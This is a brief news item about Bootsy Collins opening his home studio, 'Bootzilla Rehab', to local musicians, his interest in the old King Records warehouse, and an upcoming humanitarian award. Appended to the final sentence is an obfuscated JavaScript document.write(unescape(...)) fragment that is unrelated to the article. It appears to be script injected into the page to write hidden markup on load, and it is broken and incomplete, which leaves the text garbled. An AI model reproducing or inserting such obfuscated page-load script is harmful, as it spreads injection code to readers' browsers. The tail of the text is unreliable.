Bootsy Collins is throwing open his doors to help other budding funksters.
Collins lives outside Cincinnati and he's opened a studio in his home. He's made it available as a rehearsal space for local musicians and he calls the studio "Bootzilla Rehab." Collins says he's had his 15 minutes of fame and somehow he's gotten five more minutes. He says he wants to use that time to help other artists, because they have the same sparkle in their eyes that he had. He's looking for a bigger studio space now. He's got his eye on a warehouse that once housed King Records, the label for which Collins played bass as part of James Brown's band. Collins is also going to be given a humanitarian award during a concert Sunday in Cincinnati.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
